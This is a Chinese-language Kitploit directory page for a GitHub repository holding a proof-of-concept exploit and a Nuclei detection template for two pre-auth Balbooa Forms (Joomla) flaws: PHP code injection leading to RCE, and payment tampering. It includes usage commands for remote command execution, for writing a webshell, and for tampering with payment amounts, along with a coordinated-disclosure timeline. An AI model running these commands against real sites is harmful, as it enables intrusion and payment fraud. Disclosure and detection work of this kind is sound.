Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-67363-67364 — PoC 及检测模板,用于 Balbooa Forms(Joomla)中的预认证 RCE 和支付篡改漏洞,包含 Python 漏洞利用脚本和 Nuclei 检测模板。 | Kitploit
工具/GitHubGitHub/lulztigre/cve-2026-67363-67364
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHublulztigre/cve-2026-67363-67364

cve-2026-67363-67364

PoC 及检测模板,用于 Balbooa Forms(Joomla)中的预认证 RCE 和支付篡改漏洞,包含 Python 漏洞利用脚本和 Nuclei 检测模板。

查看仓库
720天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Balbooa Forms 预认证 RCE + 支付篡改(CVE-2026-67364 / CVE-2026-67363)

针对 Balbooa Forms(com_baforms)Joomla 组件两个预认证漏洞的 PoC 和检测模板,已在 2.4.3.2 版本中修复。

  • CVE-2026-67364 — 预认证 PHP 代码注入 -> RCE(CVSS 9.8)
  • CVE-2026-67363 — 预认证支付金额篡改(Stripe / Authorize.net)

由 Lulztigre 发现,通过 Joomla 安全打击小组(JSST)协调披露,发布于 2026-08-19。完整分析文章:https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html

文件

文件用途
balbooa_forms_poc.pyPython PoC,仅依赖标准库,覆盖两个 CVE
CVE-2026-67364.yamlNuclei 模板,对 eval RCE 进行非破坏性检测

Python PoC

零依赖(Python 3.8+)。rce 和 detect 模式不写入任何文件,也不会触发真实扣款;shell 和 pay 为可选模式,仅限实验室环境使用。

root@kitploit:~
# 1. 查找易受攻击的(form-id, submit-btn)组合。非破坏性:每个探测仅发送一次
#    匿名提交,携带 echo 标记载荷。
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10

# 2. 验证命令执行。输出直接返回在 HTTP 响应中,无持久化。
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id

# 3. 经典 webshell 验证(仅限实验室 - 写入 images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7

# 4. 支付金额篡改(仅限实验室 - 触发真实扣款尝试;需要 --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01

退出码 0 = 存在漏洞/已利用,1 = 安全或失败,2 = 用法错误。

注意事项:

  • eval RCE 需要满足文档中描述的管理员前置条件:提交按钮配置了自定义 PHP 处理器并引用 [URL 参数 = X],且该按钮未启用 reCAPTCHA。
  • --insecure 可跳过对使用自签名证书的 HTTPS 目标的 TLS 验证。
  • 较旧版本的 Joomla 可能完全不需要 CSRF 令牌;当令牌端点异常时,PoC 会在没有令牌的情况下继续执行。

Nuclei 模板

仅检测:提取匿名 CSRF 令牌,然后使用 echo 标记载荷扫描小范围的 form/btn 组合,并在响应中匹配标记。不写入任何文件,不触发真实扣款。

root@kitploit:~
nuclei -t CVE-2026-67364.yaml -u http://target -v

已在 nuclei v3.11.1(Windows + Linux)上验证:令牌提取、30 组组合扫描(form-id 1..3 x submit-btn 1..10,clusterbomb)、在易受攻击的组合上命中 1 个 critical 匹配。在离线环境中添加 -duc 可跳过更新检查。扫描范围刻意保持较小;如果目标托管了更多表单,可提高载荷范围。支付篡改(CVE-2026-67363)有意不在 nuclei 中自动化:每次探测都是对商户网关的真实扣款尝试。

披露时间线

  • 2026-08-13:通知厂商(Balbooa,[email protected])
  • 2026-08-13:向 JSST 提交 CVE 申请([email protected])
  • 2026-08-19:两个记录均已发布,在 2.4.3.2 版本中修复(安全加固更新)

仅可对您获得授权测试的系统使用。

下载工具